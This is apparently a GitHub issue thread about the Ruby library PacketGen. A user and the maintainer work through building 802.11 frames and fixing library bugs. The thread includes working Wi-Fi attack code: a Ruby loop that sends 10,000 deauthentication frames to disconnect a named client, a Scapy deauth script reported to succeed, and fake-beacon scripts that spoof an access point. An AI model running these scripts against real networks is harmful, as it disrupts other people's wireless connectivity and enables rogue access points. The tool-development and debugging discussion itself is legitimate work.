Sending Deauth packet

[KINGSABRI]

Hello guys
I see you have done a tremendous work in packetgen however I believe that more examples are needed for each header to use.

I was looking for sending Dot11 DeAuth packet and I couldn't make it using the available docs.

My suggestion is to make one or more practical example for each header as you've done with manipulate packets part.

Thanks again for the great effort

[sdaubert]

There are more examples in API documentation. See http://www.rubydoc.info/gems/packetgen/PacketGen/Header/. But, infortunately, there is no example for Dot11::DeAuth.

I'm currently working on making a better documentation (see wiki). Dot11 classes will be done with high priority.

[picatz]

Not off topic: @sdaubert Is probably one of my favorite developers ever. ❤️

[sdaubert]

@KINGSABRI Dot11 is quite special in PacketGen. You have to instanciate a subclass (here a Dot11::Management) to use it. And Management frames may contain multiple sub-headers. So, to generate a simple DeAuth packet:

pkt = PacketGen.gen('Dot11::Management', mac1: dstaddr, mac2: srcaddr, mac3: bssid).add('Dot11::DeAuth', reason: reason_code)

You also may want to add radio header:

pkt = PacketGen.gen('RadioTap').add('Dot11::Management', mac1: dstaddr, mac2: srcaddr, mac3: bssid).add('Dot11::DeAuth', reason: reason_code)

Before sending such a packet on wire, don't forget to compute checksum:

pkt.calc_checksum

[KINGSABRI]

Hello @sdaubert
I've tried both and didn't work

require 'packetgen'
iface, bssid, client, count = [ 'mon0', '2C:AB:00:A9:6C:64',  '98:F1:70:95:D1:63', 10000 ]
pkt = PacketGen.gen('RadioTap').add('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)
#pkt = PacketGen.gen('RadioTap').add('Dot11::Management', type: 0, subtype: 12, mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7).to_w(iface)
pkt.calc_checksum

count.times do
  pkt.to_w(iface)
  puts 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + ' for Client: ' + client
  sleep 0.1
end

I've tested the same scenario with scapy and it works, the client has been disconnected.

from scapy.all import *
RadioTap()/Dot11( addr1 = client, addr2 = bssid, addr3 = bssid)/Dot11Deauth()
sendp(pkt, iface = iface, count = count, inter = 0.2)

[KINGSABRI]

Another case I'm working on is creating a fake beacon as in scapy

broadcast = "ff:ff:ff:ff:ff:ff"
bssid     = "aa:aa:aa:aa:aa:aa"
iface     = "mon0"
pkt = RadioTap() / Dot11(addr1 = broadcast, addr2 = bssid, addr3 = bssid) / Dot11Beacon(cap = 0x1104) / Dot11Elt(ID=0, info = sys.argv[1]) / Dot11Elt (ID=1, info= "\x82\x84\x96\x24\x30\x48\x6c")/ Dot11Elt(ID=3, info = "\x0b") / Dot11Elt(ID=5, info="\x00\x01\x00\x00")
sendp(pkt, iface=iface, count=int(sys.argv[2]), inter = 0.2)

but in PacketGen

pkt = PacketGen.gen('RadioTap')
               .add('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid)
               .add('Dot11::Beacon', cap: 0x0431)
               .add('Dot11::Element', type: 0, value: ssid)
               .add('Dot11::Element', type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")
               .add('Dot11::Element', type: 3, value: "\x06")
               .add('Dot11::Element', type: 5, value: "\x00\x01\x00\x00")

I'm getting

/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:350:in `add_header': undefined method `protocol_name' for #<PacketGen::Header::Dot11::Element:0x000056332f6116e8> (NoMethodError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:147:in `add'

I'm trying to add more Elements to the Beacon

[KINGSABRI]

Well after more and more troubleshooting in Deauth case I found that there is nothing has been sent to the wire!
I ran Wireshark with filter ((wlan.fc.type == 0)&&(wlan.fc.type_subtype == 0x0c)) and I've got nothing captured

[sdaubert]

@KINGSABRI I think nothing has been sent on wire because RadioTap header is not set. But, it seems to me you don't need to add a RadioTap header: driver should do it for you.

Unfortunately, I can't verify that : my laptop is broken and I have no wifi on my PC.

[sdaubert]

@KINGSABRI about Elements.

Well, Elements are not headers. And i do nothing to help using them. You have to instanciate and add them by hand:

pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).
                add('Dot11::Beacon', cap: 0x0431)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 0, value: ssid)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new( type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")

Thanks to you, I see that I have still some work 😃

[KINGSABRI]

I think nothing has been sent on wire because RadioTap header is not set. But, it seems to me you don't need to add a RadioTap header: driver should do it for you.

pkt = PacketGen.gen('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)
pkt.calc_checksum
pkt.to_w(iface)

error

/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in `to_w': undefined local variable or method `crc32' for #<PacketGen::Header::Dot11::Management:0x0000557deab57468> (NameError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:216:in `to_w'
        from ./deauth.rb:30:in `<main>'

Well, Elements are not headers. And i do nothing to help using them. You have to instanciate and add them by hand:

I followed your code but getting error

/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in `to_w': undefined local variable or method `crc32' for #<PacketGen::Header::Dot11::Management:0x00005648705bebe0> (NameError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:216:in `to_w'
        from ./facke-beacon.rb:38:in `<main>'

my code

pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).add('Dot11::Beacon', cap: 0x0431)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 0, value: ssid)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 3, value: "\x06")
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 5, value: "\x00\x01\x00\x00")

pkt.calc_checksum
pkt.to_w

[KINGSABRI]

Thanks to you, I see that I have still some work

You've done a great job already, man.
Just you need people to test and report more issues and write more protocols.

I believe you need

• better documentation (actually, practical / example documentations)
• More protocol
• Focus on keep things simple to use. Things like element could be easier, like

pkt.dot11_beacon.add_element(type: 0, value: ssid)

Or

pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).add('Dot11::Beacon', cap: 0x0431).add_element('Dot11::Element', type: 0, value: ssid)

[sdaubert]

pkt.dot11_beacon.add_element(type: 0, value: ssid)

Yes, I planned something like that yesterday.

[sdaubert]

/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in to_w': undefined local variable or method crc32'

As I have no mean to test, please could you test, on erroneous line:

pcap.inject str

instead of

pcap.inject str << [crc32].pack('V')

FCS is already computed by #calc_checksum, so this code is useless.

[KINGSABRI]

@sdaubert Good news and bad news
The good news is, after I changed what you advise, it started to sending packet
The bad news is it's malformed packet something like invalid packet
Note: I used

pkt = PacketGen.gen('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)

No RadioTap header, if I add the RadioTap header, nothing gets sent.
All Deauth attacks I've seen are using RaidoTap header

[KINGSABRI]

regarding to the creating a fake beacon , nothing changed, no packets sent

[sdaubert]

@KINGSABRI Do you have an ethernet interface?

Packet#to_w sends on first network interface, which is, usually, an ethernet one. To send your Dot11 packet on your wifi card, you should have to specify your network interface, by example:

pkt.to_w('wlan0')

[KINGSABRI]

Packet#to_w sends on first network interface, which is, usually, an ethernet one. To send your Dot11 packet on your wifi card, you should have to specify your network interface, by example:

I've done that, my wireless is mon0 and I've added pkt.to_w(mon0)

I tried it on both scenarios

[sdaubert]

@KINGSABRI i have opened a new issue for this problem : #56

[sdaubert]

Doc has been updated.

See https://github.com/sdaubert/packetgen/wiki/wifi. API documentation has also been updated (not yet available on http://www.rubydoc.info/gems/packetgen/PacketGen/Header/Dot11.html, will be on next release)